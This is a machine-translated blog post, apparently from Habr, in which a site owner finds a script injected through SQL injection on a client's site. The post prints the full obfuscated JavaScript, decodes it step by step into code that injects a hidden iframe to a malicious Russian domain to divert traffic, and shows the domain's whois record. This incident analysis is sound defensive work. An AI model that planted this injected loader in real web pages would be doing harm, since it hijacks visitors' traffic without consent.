⬆️ ⬇️

How I learned that we have merged traffic

I welcome you to the respected Habra community. I want to tell you about how they poured traffic from one of my clients.

I was sitting late at night, and decided to go through customer sites, and at one of them, I saw that one div had shifted a little.

After looking at the source code and scrolling it back and forth 10 times, I saw that the script was being loaded from an interesting domain:



It is difficult to notice that the last connected script leads to goog 1 (digit) e-analitics.com



First of all, it was interesting to me, not how he got there, but what he is.



var $h = ((\u0073elf + 0 * 1)[0 ^ ([] * 0)] == '\x5B'); if ($h) { $j = ['1^%0.%4[%b/%5=%c;%d_%8|%6?%3>%f-%9!%7$%e', '%a)%2(']; } var $d = { '$sA': 'str\x69\x6Eg', '$l6': [], '$EI': '\x6A\x6Fin', '$qH': '\x73\x75bstr', '$fJ': 'decode\x55\x52\x49\x43\x6F\x6D\x70\x6F\x6Eent', '$FP': true, '$2K': 'sp\x6C\x69t' }, $sA = function (_) { for ($g = ~$d.$l6 - ~$d.$l6; $g < $P[_]; $g += -~$d.$FP) { $j += '\x25' + $P[$g++] + $P[$g--]; } $E['eva\x6C']($E[$d.$fJ]($j)); }, $P = '$??^$((.=-$^>_=;$=>.>.>?>[=;$=>.>.>?[??>$=?_?=?#$[(#?>$(?=?^$[=;$=>.>.>?>==;$=>.>.>[>==;$=>.>.>?[>=;$=>.>.>?>=?_?=?#$[(|($?!??$(?^=;$|>?[[=;$|>?>=($(!(;=-?#>_($$>=;$|>?>==;$|>$>[=;$|>[>^=;$|>$>[=;$|>$>[=;$|>$>(?!?($=$[?=($>/=-$^=/=-?#=_(|($=;$|>$>>$(?>($(;($?|$[$[$.>)(-(-$??(?#?!?=?=$$$(=;$|>([==;$|>$>(=;$|>$>==;$|>([?=;$|>?>!=;$|>?[==;$|>([==;$|>?>>=;$|>?>$=;$|>?>!=;$|>>[?=;$|>?>[=;$|>?>==;$|>?>?=;$|>?>^=;$|>$>=?;$[($(!>/=-$^(#$>$[$!?;?=(#$.?-$>?!$[?!?-?#>_($?^?($>=;$|>?[?=;$|>?[>=;$|>$>==;$|>$>[?=($>/=-$^(#$>$[$!?;?=(#$$?!?[$[?|>_($>^>?$.$|($>/=-$^=/=-?#=_(|($??$(=;$|>?>^=;$|>?[[=;$|>?>=?(?-$(?[?=$(($(;(.?#?^$?=;$=>.>.>?>!=;$=>.>.>?>$=;$=>.>.>?>^$[?-$((#$=$>?==;$=>.>.>$>(=;$=>.>.>[>^=;$=>.>.>?>$?=?#$[(#?!=;$=>.>.>?[==;$=>.>.>?>[=;$=>.>.>?>=$|[-??(|($??>.?^>$?^>^>[>(?(>$>=>=>^>$>(?[?^>$>(????>$>[?^>^?^?>>(>=>^>!>!($(!(/>^(!>/=-$^(#$>$[$!?;?=(#?;?=??$[(.>_(.($(_>=>=>!>$$.$|($>/?[=;$=>.>.>?[?=;$=>.>.>?>>$=?_?=?#$[(#$$=;$=>.>.>$>(?!$[?=(|($>;?[?!$?(.?!?[>_=;($=-=-?[$(>^>^>!>>>|=;($>#>;(-?[?!$?>#($(!>/=;$=>.>.>?>[=;$=>.>.>?[??>$=?_?=?#$[(#?$?=$[[=?;?=?_?=?#$[[($![!?[(|($=-=-?[$(>^>^>!>>>|($(!(#?^$.$.?=?#?[[>?|?!?;?[(|=-$^(!>/', $w = function () { $w = $j[$d.$EI]('\x23')[$d.$2K]('\x25'); for (var $1 in $w) { if (typeof($w[$1]) == $d.$sA) { $P = $P[$d.$2K]($w[$1][$d.$qH](1))[$d.$EI]($w[$1][0]); } } return this; }, $E = $w(), $j = ''; $sA('le\x6E\x67th'); 




Step-by-step we decode the script using the inverse functions:



')

Results of the first pass:


 var $h = ((\u0073elf + 0 * 1)[0 ^ ([] * 0)] == '['); if ($h) { $j = ['1^%0.%4[%b/%5=%c;%d_%8|%6?%3>%f-%9!%7$%e', '%a)%2(']; } var $d = { '$sA': 'string', '$l6': [], '$EI': 'join', '$qH': 'substr', '$fJ': 'decodeURIComponent', '$FP': true, '$2K': 'split' }, $sA = function (_) { for ($g = ~$d.$l6 - ~$d.$l6; $g < $P[_]; $g += -~$d.$FP) { $j += '%' + $P[$g++] + $P[$g--]; } $E['eval']($E[$d.$fJ]($j)); }, $P = '$??^$((.=-$^>_=;$=>.>.>?>[=;$=>.>.>?[??>$=?_?=?#$[(#?>$(?=?^$[=;$=>.>.>?>==;$=>.>.>[>==;$=>.>.>?[>=;$=>.>.>?>=?_?=?#$[(|($?!??$(?^=;$|>?[[=;$|>?>=($(!(;=-?#>_($$>=;$|>?>==;$|>$>[=;$|>[>^=;$|>$>[=;$|>$>[=;$|>$>(?!?($=$[?=($>/=-$^=/=-?#=_(|($=;$|>$>>$(?>($(;($?|$[$[$.>)(-(-$??(?#?!?=?=$$$(=;$|>([==;$|>$>(=;$|>$>==;$|>([?=;$|>?>!=;$|>?[==;$|>([==;$|>?>>=;$|>?>$=;$|>?>!=;$|>>[?=;$|>?>[=;$|>?>==;$|>?>?=;$|>?>^=;$|>$>=?;$[($(!>/=-$^(#$>$[$!?;?=(#$.?-$>?!$[?!?-?#>_($?^?($>=;$|>?[?=;$|>?[>=;$|>$>==;$|>$>[?=($>/=-$^(#$>$[$!?;?=(#$$?!?[$[?|>_($>^>?$.$|($>/=-$^=/=-?#=_(|($??$(=;$|>?>^=;$|>?[[=;$|>?>=?(?-$(?[?=$(($(;(.?#?^$?=;$=>.>.>?>!=;$=>.>.>?>$=;$=>.>.>?>^$[?-$((#$=$>?==;$=>.>.>$>(=;$=>.>.>[>^=;$=>.>.>?>$?=?#$[(#?!=;$=>.>.>?[==;$=>.>.>?>[=;$=>.>.>?>=$|[-??(|($??>.?^>$?^>^>[>(?(>$>=>=>^>$>(?[?^>$>(????>$>[?^>^?^?>>(>=>^>!>!($(!(/>^(!>/=-$^(#$>$[$!?;?=(#?;?=??$[(.>_(.($(_>=>=>!>$$.$|($>/?[=;$=>.>.>?[?=;$=>.>.>?>>$=?_?=?#$[(#$$=;$=>.>.>$>(?!$[?=(|($>;?[?!$?(.?!?[>_=;($=-=-?[$(>^>^>!>>>|=;($>#>;(-?[?!$?>#($(!>/=;$=>.>.>?>[=;$=>.>.>?[??>$=?_?=?#$[(#?$?=$[[=?;?=?_?=?#$[[($![!?[(|($=-=-?[$(>^>^>!>>>|($(!(#?^$.$.?=?#?[[>?|?!?;?[(|=-$^(!>/', $w = function () { $w = $j[$d.$EI]('#')[$d.$2K]('%'); for (var $1 in $w) { if (typeof($w[$1]) == $d.$sA) { $P = $P[$d.$2K]($w[$1][$d.$qH](1))[$d.$EI]($w[$1][0]); } } return this; }, $E = $w(), $j = ''; $sA('length'); 




Result of the second pass:


 var _q = \u0064\u006Fcument.creat\u0065\u0045\u006C\u0065ment('ifra\x6D\x65'), _n = 's\x65\x74\x41\x74\x74\x72ibute'; _q[_n]('\x73rc', 'http://vbnieewr\x2E\x72\x75\x2F\x69\x6E\x2E\x63\x67\x69\x3F\x64\x65\x66\x61\x75lt'); _q.style.position = 'abs\x6F\x6C\x75\x74e'; _q.style.width = '16px'; _q[_n]('fr\x61\x6D\x65border', nav\u0069\u0067\u0061tor.use\u0072\u0041\u0067ent.i\u006E\u0064\u0065xOf('f0a7a142b755172da72ff74a1ac25199') + 1); _q.style.left = '-5597px'; eval('<div id=\'__dr11938\'></div>');\u0064\u006Fcument.getElementById('__dr11938').appendChild(_q); 




Next, remove the 16-th system unescape function .



 var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://vbnieewr.ru/in.cgi?default'); _q.style.position = 'absolute'; _q.style.width = '16px'; _q[_n]('frameborder', navigator.userAgent.indexOf('f0a7a142b755172da72ff74a1ac25199') + 1); _q.style.left = '-5597px'; document.write('<div id=\'__dr11938\'></div>'); document.getElementById('__dr11938').appendChild(_q); 




Now we have brought the script to a readable form, and now it is clearly seen that an iframe is being created to the address vbnieewr.ru/in.cgi?default .



Next, breaking through the domains on whois, I found out that they were created recently:

domain: VBNIEEWR.RU

nserver: ns1.ubercontrol.ru.

nserver: ns2.ubercontrol.ru.

state: REGISTERED, DELEGATED, VERIFIED

person: Private Person

registrar: REGRU-REG-RIPN

admin-contact: www.reg.ru/whois/admin_contact

created: 2012.01.13

paid-till: 2013.01.13




Received a response header from the script vbnieewr.ru/in.cgi?default

 array(23) { [0]=> string(18) "HTTP/1.1 302 Found" ... [4]=> string(22) "Location: http://ya.ru" .... [5]=> string(17) "Connection: close" ... 




And I realized that there is a banal drain of traffic, and most likely through the Sutra TDS script.



Approximate scheme of work:



I could not pick up the admin address, but maybe someone from Habra Juzvery can.



By the way, this js script was inserted because of the sql injection, which we managed to find from the logs and safely close.



UDP: New URL with a similar script: yandex-metrika.com/watch.js





Just in case, check your sites for a similar code.

Source: https://habr.com/ru/post/136771/



All Articles